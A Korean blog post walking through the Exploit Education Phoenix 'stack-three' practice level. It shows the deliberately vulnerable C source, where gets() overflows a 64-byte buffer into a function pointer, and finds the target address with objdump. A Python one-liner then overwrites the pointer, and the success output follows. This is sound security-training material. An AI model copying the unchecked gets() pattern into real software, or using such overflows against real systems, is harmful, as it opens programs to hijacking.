![[Phoenix] Stack three](https://img1.daumcdn.net/thumb/R750x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2F4bjdl%2FbtrM6XbrlGD%2F2gAeliEHzuJTk4gu34oW00%2Fimg.png)
728x90
반응형
1. intro
2. code 및 분석
2.1. C code
/*
* phoenix/stack-three, by https://exploit.education
*
* The aim is to change the contents of the changeme variable to 0x0d0a090a
*
* When does a joke become a dad joke?
* When it becomes apparent.
* When it's fully groan up.
*
*/
#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define BANNER \
"Welcome to " LEVELNAME ", brought to you by https://exploit.education"
char *gets(char *);
void complete_level() {
printf("Congratulations, you've finished " LEVELNAME " :-) Well done!\n");
exit(0);
}
int main(int argc, char **argv) {
struct {
char buffer[64];
volatile int (*fp)();
} locals;
printf("%s\n", BANNER);
locals.fp = NULL;
gets(locals.buffer);
if (locals.fp) {
printf("calling function pointer @ %p\n", locals.fp);
fflush(stdout);
locals.fp();
} else {
printf("function pointer remains unmodified :~( better luck next time!\n");
}
exit(0);
}
2.2. 분석
buffer 변수에 값을 받아들이며, fp 변수가 complete_level 함수의 주소가 되어야 한다.
3. 취약점 확인 및 공격 준비
3.1. 취약점
gets. 크기 체크 안함.
3.2. 공격 준비
complete_level의 주소만 알면 될 것 같다.
어차피 buffer 위치 이후가 fp 일테니.
user@phoenix-amd64:/opt/phoenix/amd64$ objdump -d ./stack-three | grep complete_level
000000000040069d <complete_level>:
4. exploit
user@phoenix-amd64:/opt/phoenix/amd64$ (python -c 'print "A"*64+"\x9d\x06\x40\x00\x00\x00\x00\x00"') | ./stack-three
Welcome to phoenix/stack-three, brought to you by https://exploit.education
calling function pointer @ 0x40069d
Congratulations, you've finished phoenix/stack-three :-) Well done!728x90
반응형
'Wargame > Exploit Education' 카테고리의 다른 글
| [Phoenix] Stack five (0) | 2022.09.27 |
|---|---|
| [Phoenix] Stack four (0) | 2022.09.27 |
| [phoenix] Stack Two (0) | 2022.09.26 |
| [Phoenix] Stack One (0) | 2022.09.26 |
| [Phoenix] Stack Zero (0) | 2022.09.26 |